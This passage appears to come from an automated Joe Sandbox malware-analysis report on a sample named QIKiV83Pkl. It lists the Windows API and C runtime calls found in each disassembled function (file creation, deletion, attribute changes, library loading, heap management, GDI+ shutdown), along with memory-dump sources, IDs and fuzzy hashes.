                • Instruction Fuzzy Hash: ECF0BE3164521CBBDF056F64CC06DAEBF61FF16760B444454FC199A760DB728A10EBD2
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Similarity
                • API ID: Alloc
                • String ID: FlsAlloc
                • API String ID: 2773662609-671089009
                • Opcode ID: bd447e30bc40ed68833ba8a7ba9017ecbbf42ddfe5f774951136e505669e9d76
                • Instruction ID: 989ac9d9419d54fe25bd1e2d1f30849ebb03b4212701083ef3a3de7450cf2dd0
                • Opcode Fuzzy Hash: bd447e30bc40ed68833ba8a7ba9017ecbbf42ddfe5f774951136e505669e9d76
                • Instruction Fuzzy Hash: 4AE05530B8522C6BAA187FA48C029AEBB50FB26711B460018FC05D7740DE744E00A2DA
                APIs
                • try_get_function.LIBVCRUNTIME ref: 008932AF
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Similarity
                • API ID: try_get_function
                • String ID: FlsAlloc
                • API String ID: 2742660187-671089009
                • Opcode ID: c94dc64970f07597b9a20d6e8c35befcf003a7eeb94f193133c9fa30ee78cf2a
                • Instruction ID: cc7bc7e2e634f229189541d70170b786c627d20a1bec86737abb6bafbca7ae7b
                • Opcode Fuzzy Hash: c94dc64970f07597b9a20d6e8c35befcf003a7eeb94f193133c9fa30ee78cf2a
                • Instruction Fuzzy Hash: 8DD02B227806346AE51036D46C039AE7F04FB03FF2F490152FE0CDA743A4A5458002C6
                APIs
                  • Part of subcall function 0089AF1B: GetOEMCP.KERNEL32(00000000,?,?,0089B1A5,?), ref: 0089AF46
                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0089B1EA,?,00000000), ref: 0089B3C4
                • GetCPInfo.KERNEL32(00000000,0089B1EA,?,?,?,0089B1EA,?,00000000), ref: 0089B3D7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Similarity
                • API ID: CodeInfoPageValid
                • String ID:
                • API String ID: 546120528-0
                • Opcode ID: 331149e84ec3d77a39d07e0f6f6ce0f71fba17e37c8299773b269b6f2789856e
                • Instruction ID: 62daebb850c6c0a8a4abe7408db148d1312ea6482b6be816cda7d1b17b00d4db
                • Opcode Fuzzy Hash: 331149e84ec3d77a39d07e0f6f6ce0f71fba17e37c8299773b269b6f2789856e
                • Instruction Fuzzy Hash: 8B5166B0A002059EDF24AF75E9806BABBE5FF41304F1C446ED096CB653D739D541EB85
                APIs
                • __EH_prolog.LIBCMT ref: 00871385
                  • Part of subcall function 00876057: __EH_prolog.LIBCMT ref: 0087605C
                  • Part of subcall function 0087C827: __EH_prolog.LIBCMT ref: 0087C82C
                  • Part of subcall function 0087C827: new.LIBCMT ref: 0087C86F
                  • Part of subcall function 0087C827: new.LIBCMT ref: 0087C893
                • new.LIBCMT ref: 008713FE
                  • Part of subcall function 0087B07D: __EH_prolog.LIBCMT ref: 0087B082
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 341c67da9b738f611ee6c506e8bcde4515851a365ebb0ca99867965490c8321b
                • Instruction ID: 76ef9b5ce2271e482465c2085daefe2397d0625be51b5ca49ee01f2a490f6741
                • Opcode Fuzzy Hash: 341c67da9b738f611ee6c506e8bcde4515851a365ebb0ca99867965490c8321b
                • Instruction Fuzzy Hash: 0A4117B0805B40DED724DF7984859E6FAE6FB18300F504A2ED6EEC3282DB326554CB16
                APIs
                • __EH_prolog.LIBCMT ref: 00871385
                  • Part of subcall function 00876057: __EH_prolog.LIBCMT ref: 0087605C
                  • Part of subcall function 0087C827: __EH_prolog.LIBCMT ref: 0087C82C
                  • Part of subcall function 0087C827: new.LIBCMT ref: 0087C86F
                  • Part of subcall function 0087C827: new.LIBCMT ref: 0087C893
                • new.LIBCMT ref: 008713FE
                  • Part of subcall function 0087B07D: __EH_prolog.LIBCMT ref: 0087B082
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: fc7319832aefabbc5cfcfa3659d21c31fede9af6cda27b86648bcfd1beda7ae8
                • Instruction ID: f51a56c99e4181640ec02e2d477d6b5287557fe904280f2066cb31d05d8fff16
                • Opcode Fuzzy Hash: fc7319832aefabbc5cfcfa3659d21c31fede9af6cda27b86648bcfd1beda7ae8
                • Instruction Fuzzy Hash: 4D4118B0805B409EE724DF7984859E7FAE5FF18300F504A2ED2EEC3282DB326554CB16
                APIs
                  • Part of subcall function 00898FA5: GetLastError.KERNEL32(?,008B0EE8,00893E14,008B0EE8,?,?,00893713,00000050,?,008B0EE8,00000200), ref: 00898FA9
                  • Part of subcall function 00898FA5: _free.LIBCMT ref: 00898FDC
                  • Part of subcall function 00898FA5: SetLastError.KERNEL32(00000000,?,008B0EE8,00000200), ref: 0089901D
                  • Part of subcall function 00898FA5: _abort.LIBCMT ref: 00899023
                  • Part of subcall function 0089B2AE: _abort.LIBCMT ref: 0089B2E0
                  • Part of subcall function 0089B2AE: _free.LIBCMT ref: 0089B314
                  • Part of subcall function 0089AF1B: GetOEMCP.KERNEL32(00000000,?,?,0089B1A5,?), ref: 0089AF46
                • _free.LIBCMT ref: 0089B200
                • _free.LIBCMT ref: 0089B236
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Similarity
                • API ID: _free$ErrorLast_abort
                • String ID:
                • API String ID: 2991157371-0
                • Opcode ID: f9443e5e200fa0c144c77ab8169d419f853c1b1224de6f943a57f6d1f510a226
                • Instruction ID: abba0e696b12d54b1bf003c5c8d1409b07b4b95db440b4b00bfac05cab2c42aa
                • Opcode Fuzzy Hash: f9443e5e200fa0c144c77ab8169d419f853c1b1224de6f943a57f6d1f510a226
                • Instruction Fuzzy Hash: 6531C231904209AFDF10FFADE941AADB7E5FF42320F2940A9E814DB291EB719D41CB51
                APIs
                • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00879EDC,?,?,00877867), ref: 008797A6
                • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00879EDC,?,?,00877867), ref: 008797DB
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: dd8ef03c9b6c58a2f71e3d770873f211d940d468421c4703c059eb2629b0621c
                • Instruction ID: 81714ae1387d278a4a894ae560c5592f12cffa7f6f42d111de82c4781e6a3885
                • Opcode Fuzzy Hash: dd8ef03c9b6c58a2f71e3d770873f211d940d468421c4703c059eb2629b0621c
                • Instruction Fuzzy Hash: B721E6B1110748AEE7348F64C886BA777E8FB497A4F00891DF5D9C21A1C374EC449B61
                APIs
                • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00877547,?,?,?,?), ref: 00879D7C
                • SetFileTime.KERNELBASE(?,?,?,?), ref: 00879E2C
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Similarity
                • API ID: File$BuffersFlushTime
                • String ID:
                • API String ID: 1392018926-0
                • Opcode ID: e3d092c63dca8d3f03fd099ca3d28ff884be369c4b892bf91e6362d0cb682453
                • Instruction ID: 144b4a28699eb2420f23c748416bb161752db023d0d342af7827d0e4ec4cd0bc
                • Opcode Fuzzy Hash: e3d092c63dca8d3f03fd099ca3d28ff884be369c4b892bf91e6362d0cb682453
                • Instruction Fuzzy Hash: 8F21B431148286ABC724DE24C491EAABFE4FF56708F04881DF8D5C7555D329DA0CDB51
                APIs
                • GetProcAddress.KERNEL32(00000000,008A3958), ref: 0089A4B8
                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0089A4C5
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Similarity
                • API ID: AddressProc__crt_fast_encode_pointer
                • String ID:
                • API String ID: 2279764990-0
                • Opcode ID: a124b964d64f079a5dab469eb6a0777febb7e0dc4b24d65c6d5166de9e360aea
                • Instruction ID: 4c1c48ade90cf8a3f49b489bbb9a0c54974f1b203b5d7586096e57deff563302
                • Opcode Fuzzy Hash: a124b964d64f079a5dab469eb6a0777febb7e0dc4b24d65c6d5166de9e360aea
                • Instruction Fuzzy Hash: 4C110633A012259BAF2EAE2CEC4486A7395FB8132471E4620FD15EB644EB70EC41C7D6
                APIs
                • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00879B35,?,?,00000000,?,?,00878D9C,?), ref: 00879BC0
                • GetLastError.KERNEL32 ref: 00879BCD
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Similarity
                • API ID: ErrorFileLastPointer
                • String ID:
                • API String ID: 2976181284-0
                • Opcode ID: 37d5df8bbcbb20448d8c6b119ba718f0b76b949bf69794669a362dc59177b46d
                • Instruction ID: 23b22720973af1e47828899e3d3bdb2fdee52546743bfe0e0bf9a122f250fce8
                • Opcode Fuzzy Hash: 37d5df8bbcbb20448d8c6b119ba718f0b76b949bf69794669a362dc59177b46d
                • Instruction Fuzzy Hash: 9201C4313042299B8B08CE69AC9497EB399FFC5731B14C62DF99AC7294CB31D805AB21
                APIs
                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00879E76
                • GetLastError.KERNEL32 ref: 00879E82
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ErrorFileLastPointer
                • String ID:
                • API String ID: 2976181284-0
                • Opcode ID: 504c4af7a69332a06df35f883a93bb5e344edf8f57f41111d55a271dcdbf3459
                • Instruction ID: de7044ea1a6a97c3a44b528190d03b5aa63f7c6b082b576d449f68dd1c65de4e
                • Opcode Fuzzy Hash: 504c4af7a69332a06df35f883a93bb5e344edf8f57f41111d55a271dcdbf3459
                • Instruction Fuzzy Hash: 430192723046045BEB34DE69DC48B6BB6D9FB85328F14893DF18AC2684DAB5EC488711
                APIs
                • _free.LIBCMT ref: 00898627
                  • Part of subcall function 00898518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0089C13D,00000000,?,008967E2,?,00000008,?,008989AD,?,?,?), ref: 0089854A
                • HeapReAlloc.KERNEL32(00000000,?,?,?,?,008B0F50,0087CE57,?,?,?,?,?,?), ref: 00898663
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Heap$AllocAllocate_free
                • String ID:
                • API String ID: 2447670028-0
                • Opcode ID: d7ea92702ff12d870f3baa7ce40c65ddb7f96b6572e65bf39e42270e43ab2060
                • Instruction ID: 5649f756b3930115d3c627aa8395f138744804980bfd1bc196d24474c46ccb08
                • Opcode Fuzzy Hash: d7ea92702ff12d870f3baa7ce40c65ddb7f96b6572e65bf39e42270e43ab2060
                • Instruction Fuzzy Hash: D1F06232205117E6DF223A29AC08F6B3758FFB37A4F2D4116F854DE191DF20D80195A6
                APIs
                  • Part of subcall function 0089B610: GetEnvironmentStringsW.KERNEL32 ref: 0089B619
                  • Part of subcall function 0089B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0089B63C
                  • Part of subcall function 0089B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0089B662
                  • Part of subcall function 0089B610: _free.LIBCMT ref: 0089B675
                  • Part of subcall function 0089B610: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0089B684
                • _free.LIBCMT ref: 008979FD
                • _free.LIBCMT ref: 00897A04
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                • String ID:
                • API String ID: 400815659-0
                • Opcode ID: 0a4f27b0b8e64af6c88e11727efd8e68d7f9d6a4a4348c1270991dc10529eda0
                • Instruction ID: 859c8abf5bebe67b0a170d28fc1bf29bb087e06125efbf1bbffcaf2a5c3b6dc6
                • Opcode Fuzzy Hash: 0a4f27b0b8e64af6c88e11727efd8e68d7f9d6a4a4348c1270991dc10529eda0
                • Instruction Fuzzy Hash: 75E0ED12A1D41611DF62B2BE3D0666F0B44FF82330B2D0B2BF521EB9C2DE148802009B
                APIs
                • GetCurrentProcess.KERNEL32(?,?), ref: 00880915
                • GetProcessAffinityMask.KERNEL32(00000000), ref: 0088091C
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Process$AffinityCurrentMask
                • String ID:
                • API String ID: 1231390398-0
                • Opcode ID: 039303f0e0d2b6055acc9c56512144c96e7157723ecd6d6811900c4df5f19f72
                • Instruction ID: 600cbb8ae1f4013b4fc05049c74827b802f3ed3da3b3f36a50248881ae199ded
                • Opcode Fuzzy Hash: 039303f0e0d2b6055acc9c56512144c96e7157723ecd6d6811900c4df5f19f72
                • Instruction Fuzzy Hash: 32E09233A1150ABB7F49EAB49C048BB7B9DFB052147214179F806D7601F930DE098FA0
                APIs
                • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0087A27A,?,?,?,0087A113,?,00000001,00000000,?,?), ref: 0087A458
                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0087A27A,?,?,?,0087A113,?,00000001,00000000,?,?), ref: 0087A489
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 6e691eda041c1a5a1b2fc2aacc50639176f455b9afa3338fbd3b5d0903bbdb0e
                • Instruction ID: 7b07fab619c72db1a809122248c185df3a38c6a914bad074f952b04f65fc0e1c
                • Opcode Fuzzy Hash: 6e691eda041c1a5a1b2fc2aacc50639176f455b9afa3338fbd3b5d0903bbdb0e
                • Instruction Fuzzy Hash: 6DF08C312402097BEB016E60DC05BDA776CFB05385F04C051BC8CE6165DB72DAA8AB51
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ItemText_swprintf
                • String ID:
                • API String ID: 3011073432-0
                • Opcode ID: 5676294d3c7c94667883471ea092b6b63dda521e9a108b72387737fb2ce9c088
                • Instruction ID: 49af1f9fb6dfabe4e29049d45e556095c74349167c9ab7575baf48fb63b054b1
                • Opcode Fuzzy Hash: 5676294d3c7c94667883471ea092b6b63dda521e9a108b72387737fb2ce9c088
                • Instruction Fuzzy Hash: E1F0A071504348AAEB21BBB49C06FAA3B5DFB04745F044696B604D30B2DA71BA608762
                APIs
                • DeleteFileW.KERNELBASE(?,?,?,0087984C,?,?,00879688,?,?,?,?,008A1FA1,000000FF), ref: 0087A13E
                • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0087984C,?,?,00879688,?,?,?,?,008A1FA1,000000FF), ref: 0087A16C
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: DeleteFile
                • String ID:
                • API String ID: 4033686569-0
                • Opcode ID: bc432081496030675d99d4e8a650e7de1e5eeb97392037e2c8e9b3868f728961
                • Instruction ID: c6b8a276c8a40d4f69e695ab93c6c80c1c3b5712b49058aca7bdb35ee9ffa097
                • Opcode Fuzzy Hash: bc432081496030675d99d4e8a650e7de1e5eeb97392037e2c8e9b3868f728961
                • Instruction Fuzzy Hash: CAE092356402086BEB11AF64DC41FEA775CFB09381F888065B988D3164DB61DD94AFA1
                APIs
                • GdiplusShutdown.GDIPLUS(?,?,?,?,008A1FA1,000000FF), ref: 0088A3D1
                • OleUninitialize.OLE32(?,?,?,?,008A1FA1,000000FF), ref: 0088A3D6
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: GdiplusShutdownUninitialize
                • String ID:
                • API String ID: 3856339756-0
                • Opcode ID: 161dd7f394702049483b1cde4c6e98fe65dc5bcc407ebd49e3e3fa19119940de
                • Instruction ID: 323e10f5b12eef76b97bfd886a869da53ed585adcb0ef009c01816a23717ee1d
                • Opcode Fuzzy Hash: 161dd7f394702049483b1cde4c6e98fe65dc5bcc407ebd49e3e3fa19119940de
                • Instruction Fuzzy Hash: E7F03932658655EFCB10AB4CDC05B59FBACFB89B20F04436AF419C3B60CB786800CA91
                APIs
                • GetFileAttributesW.KERNELBASE(?,?,?,0087A189,?,008776B2,?,?,?,?), ref: 0087A1A5
                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0087A189,?,008776B2,?,?,?,?), ref: 0087A1D1
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: fae5c582ad5f9b3006e1bb310f841559cdefc6b4242ea148310bb3cff5f66169
                • Instruction ID: 40ffcb242d191edc0f25960f1e195000917bddc8dc12ae1c00f5a0886295cc3e
                • Opcode Fuzzy Hash: fae5c582ad5f9b3006e1bb310f841559cdefc6b4242ea148310bb3cff5f66169
                • Instruction Fuzzy Hash: EFE0D8355001285BDB20EB68DC05BD9B75CFB093E1F0082A1FD49E36A4D770DD449BE1
                APIs
                • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008800A0
                • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087EB86,Crypt32.dll,00000000,0087EC0A,?,?,0087EBEC,?,?,?), ref: 008800C2
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: DirectoryLibraryLoadSystem
                • String ID:
                • API String ID: 1175261203-0
                • Opcode ID: 6165037fc5b80f877d61393d1e201798fff692b4c7123a25902476f37eff1cc0
                • Instruction ID: 8ea1b63bafd3ea895ae92db37cf4173a6121e0130870f26da4b7884f5b5010fc
                • Opcode Fuzzy Hash: 6165037fc5b80f877d61393d1e201798fff692b4c7123a25902476f37eff1cc0
                • Instruction Fuzzy Hash: 89E0127690151C6ADB21AAA49C05FD6B76CFF0A382F0400A5BA48D3114DA74DA44CBA1
                APIs
                • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00889B30
                • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00889B37
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: BitmapCreateFromGdipStream
                • String ID:
                • API String ID: 1918208029-0
                • Opcode ID: e6a6a3fab4069be66a0e1ec6af60b1cd3c2fa70920b6633d7adceeb4b8c9435a
                • Instruction ID: b1c436ddc9ae0a890a42f05ff9a7ff1755d2dc9aeab070a7326a1f8a0481f1f6
                • Opcode Fuzzy Hash: e6a6a3fab4069be66a0e1ec6af60b1cd3c2fa70920b6633d7adceeb4b8c9435a
                • Instruction Fuzzy Hash: CEE0ED71901219EFDB10EF98D9017AAB7E8FB05321F20805BF899D3600D7B16E04AB91
                APIs
                  • Part of subcall function 0089329A: try_get_function.LIBVCRUNTIME ref: 008932AF
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0089217A
                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00892185
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
